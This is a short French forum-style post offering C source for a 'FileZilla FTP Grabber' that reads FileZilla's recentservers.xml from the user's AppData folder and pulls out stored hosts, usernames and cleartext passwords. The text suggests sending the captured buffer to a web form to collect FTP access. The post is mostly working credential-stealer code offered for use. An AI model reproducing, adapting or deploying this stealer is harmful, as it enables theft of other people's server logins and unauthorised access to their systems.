Tweet
[C] FileZilla FTP Grabber
FileZilla stocke ses mots de passe en clair...
Exploit.
Ne reste plus qu'à envoyer le buffer dans un formulaire web et à récupérer les accès FTP.
Super FileZilla...
Crédit : pUr3 h4t3
Exploit.
Code:
/******************************
**********PureHate(C)**********
******************************/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <Shlobj.h>
#ifdef _MSC_VER
#define _CRT_SECURE_NO_WARNINGS
#endif
int GetAppDataFolder(char szPath[0x104])
{
if(SUCCEEDED(SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, szPath)))
{
strcat(szPath, "\\");
return 0;
}
return -1;
}
char * ParseLine(char buff[0x104*2])
{
char szInfo[0x104*2] = "";
char * pWord = NULL;
char * i = NULL, * j = NULL;
int k = 0;
if (pWord = strstr(buff, "<Host>")){
i = pWord+6;
j = strrchr(i, '<');
k = j - i;
_snprintf(szInfo, k+6, "\nHost:%s", i);
return szInfo;
}
if (pWord = strstr(buff, "<User>")){
i = pWord+6;
j = strrchr(i, '<');
k = j - i;
_snprintf(szInfo, k+6, "\nUser:%s", i);
return szInfo;
}
if (pWord = strstr(buff, "<Pass>")){
i = pWord+6;
j = strrchr(i, '<');
k = j - i;
_snprintf(szInfo, k+6, "\nPass:%s", i);
return szInfo;
}
return NULL;
}
int main (void)
{
char szPath[0x104] ="";
char szLine[0x104*2] = "";
char szGrabed[0x104*8] = "FileZilla Acount.\n";
GetAppDataFolder(szPath);
strcat(szPath, "\\FileZilla\\recentservers.xml");
FILE * pFile = NULL;
pFile = fopen(szPath, "r");
if (pFile){
char * pTemp;
while(fgets(szLine, sizeof(szLine), pFile) != NULL){
pTemp = ParseLine(szLine);
if (pTemp){
strcat(szGrabed, pTemp);
}
}
printf(szGrabed);
system ("pause");
}else{
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}
Super FileZilla...
Crédit : pUr3 h4t3
Commentaire